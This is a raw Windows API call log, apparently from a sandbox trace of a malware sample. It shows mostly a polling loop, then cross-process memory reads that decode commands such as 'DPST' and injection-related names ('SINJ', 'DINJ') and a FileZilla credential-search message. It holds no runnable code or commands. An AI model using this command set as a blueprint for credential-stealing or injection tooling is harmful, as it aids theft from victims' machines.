	[0233.736] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.737] Sleep (dwMilliseconds=0xbb8) 
	[0233.752] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.752] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.752] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.753] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.753] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.753] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.753] Sleep (dwMilliseconds=0xbb8) 
	[0233.767] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.767] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.767] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.767] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.767] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.767] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.767] Sleep (dwMilliseconds=0xbb8) 
	[0233.782] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.782] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.782] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.782] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.783] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.783] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.783] Sleep (dwMilliseconds=0xbb8) 
	[0233.798] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.798] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.798] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.798] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.798] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.798] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.798] Sleep (dwMilliseconds=0xbb8) 
	[0233.813] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.814] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.814] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.814] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.814] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.814] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.814] Sleep (dwMilliseconds=0xbb8) 
	[0233.829] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.829] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.829] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.829] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.829] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.829] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.829] Sleep (dwMilliseconds=0xbb8) 
	[0233.845] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.845] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.845] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.845] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.845] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.845] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.845] Sleep (dwMilliseconds=0xbb8) 
	[0233.861] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.861] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.861] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.861] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.861] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.861] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.861] Sleep (dwMilliseconds=0xbb8) 
	[0233.876] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.876] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.876] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.876] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.876] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.876] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.876] Sleep (dwMilliseconds=0xbb8) 
	[0233.892] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.892] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.892] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.892] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.892] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.892] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.892] Sleep (dwMilliseconds=0xbb8) 
	[0233.907] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.907] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.907] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.907] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.907] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.907] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.908] Sleep (dwMilliseconds=0xbb8) 
	[0233.924] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.924] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.924] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.924] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.924] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.925] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.925] Sleep (dwMilliseconds=0xbb8) 
	[0233.956] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.956] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.956] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.956] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.956] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.956] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.956] Sleep (dwMilliseconds=0xbb8) 
	[0233.970] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.970] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.970] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.970] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.970] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.971] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.971] Sleep (dwMilliseconds=0xbb8) 
	[0234.032] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.032] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.032] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.032] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.032] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.032] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0234.032] Sleep (dwMilliseconds=0xbb8) 
	[0234.110] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0234.110] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225968
	[0234.110] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x22eb8b0
	[0234.110] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225eb8
	[0234.110] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0234.110] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225968, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225968*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0234.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225968, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0234.110] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad240
	[0234.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225968, cbMultiByte=-1, lpWideCharStr=0x22ad240, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0234.110] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x22eb8b0, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x22eb8b0, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0234.110] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225eb8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225eb8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0234.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225eb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0234.110] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ef70
	[0234.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225eb8, cbMultiByte=-1, lpWideCharStr=0x231ef70, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0234.110] SetEvent (hEvent=0x474) returned 1
	[0234.110] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225968) returned 1
	[0234.110] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22eb8b0) returned 1
	[0234.110] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225eb8) returned 1
	[0234.110] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231eb38
	[0234.111] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0234.111] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0234.111] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0234.111] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0234.111] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0234.111] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2d0
	[0234.111] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x231ef48, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xd78) returned 0x5d8
	[0234.147] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231eb60
	[0234.147] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.147] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.147] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.147] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.147] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231eb60) returned 1
	[0234.147] Sleep (dwMilliseconds=0xbb8) 
	[0234.157] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.157] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.157] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.157] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.157] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.157] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231eb60) returned 1
	[0234.157] Sleep (dwMilliseconds=0xbb8) 
	[0234.172] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.172] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.173] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.173] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.173] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.173] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231c8d8) returned 1
	[0234.173] Sleep (dwMilliseconds=0xbb8) 
	[0234.192] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.192] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.192] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.192] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.192] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.192] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27784d8) returned 1
	[0234.192] Sleep (dwMilliseconds=0xbb8) 
	[0234.204] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.204] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.204] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.204] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.204] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.204] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27784d8) returned 1
	[0234.204] Sleep (dwMilliseconds=0xbb8) 
	[0234.254] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.254] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.254] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.254] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.254] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.254] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27784d8) returned 1
	[0234.254] Sleep (dwMilliseconds=0xbb8) 
	[0234.266] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.266] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.266] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.266] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.266] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.266] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27784d8) returned 1
	[0234.266] Sleep (dwMilliseconds=0xbb8) 
	[0234.282] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.282] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.282] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.282] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.282] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.282] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27784d8) returned 1
	[0234.282] Sleep (dwMilliseconds=0xbb8) 
	[0234.297] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.297] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.297] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.297] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.297] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.297] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27784d8) returned 1
	[0234.297] Sleep (dwMilliseconds=0xbb8) 
	[0234.313] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.313] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.313] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.313] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.313] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.313] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27784d8) returned 1
	[0234.313] Sleep (dwMilliseconds=0xbb8) 
	[0234.328] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.329] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.329] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.329] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.329] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.329] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27784d8) returned 1
	[0234.329] Sleep (dwMilliseconds=0xbb8) 
	[0234.344] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.344] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.344] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.344] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.344] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.344] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27784d8) returned 1
	[0234.344] Sleep (dwMilliseconds=0xbb8) 
	[0234.360] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.360] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.360] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.360] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.360] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.360] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27784d8) returned 1
	[0234.360] Sleep (dwMilliseconds=0xbb8) 
	[0234.382] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.382] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.382] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.383] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.383] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.383] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27784d8) returned 1
	[0234.383] Sleep (dwMilliseconds=0xbb8) 
	[0234.391] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.391] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.391] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.391] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.391] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.391] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27784d8) returned 1
	[0234.400] Sleep (dwMilliseconds=0xbb8) 
	[0234.406] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.406] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.406] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.406] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.406] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.406] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27784d8) returned 1
	[0234.407] Sleep (dwMilliseconds=0xbb8) 
	[0234.422] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.422] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.422] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.422] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.422] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.422] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27784d8) returned 1
	[0234.422] Sleep (dwMilliseconds=0xbb8) 
	[0234.437] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.438] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.438] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.438] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.438] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.438] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27784d8) returned 1
	[0234.438] Sleep (dwMilliseconds=0xbb8) 
	[0234.456] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.456] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x102
	[0234.456] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225968
	[0234.456] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x22eb8b0
	[0234.456] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225c10
	[0234.456] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0234.456] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16efac1, lpBuffer=0x225968, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225968*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0234.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225968, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0234.456] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffde0
	[0234.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225968, cbMultiByte=-1, lpWideCharStr=0x22ffde0, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5
	[0234.456] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16efa91, lpBuffer=0x22eb8b0, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x22eb8b0*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0234.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22eb8b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35
	[0234.457] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x50) returned 0x22aa070
	[0234.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22eb8b0, cbMultiByte=-1, lpWideCharStr=0x22aa070, cchWideChar=35 | out: lpWideCharStr="Filezilla: no recent servers found") returned 35
	[0234.457] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16ef7b4, lpBuffer=0x225c10, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225c10*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0234.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0234.457] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778618
	[0234.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225c10, cbMultiByte=-1, lpWideCharStr=0x2778618, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0234.457] SetEvent (hEvent=0x49c) returned 1
	[0234.458] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225968) returned 1
	[0234.458] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22eb8b0) returned 1
	[0234.458] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225c10) returned 1
	[0234.458] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778780
	[0234.458] lstrcmpiW (lpString1="DPST", lpString2="ModuleQuery") returned -1
	[0234.458] lstrcmpiW (lpString1="DPST", lpString2="WantRelease") returned -1
	[0234.458] lstrcmpiW (lpString1="DPST", lpString2="VERS") returned -1
	[0234.458] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0234.458] lstrcmpiW (lpString1="DPST", lpString2="DINJ") returned 1
	[0234.458] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fffc0
	[0234.458] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27784d8, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xdb0) returned 0x5b0
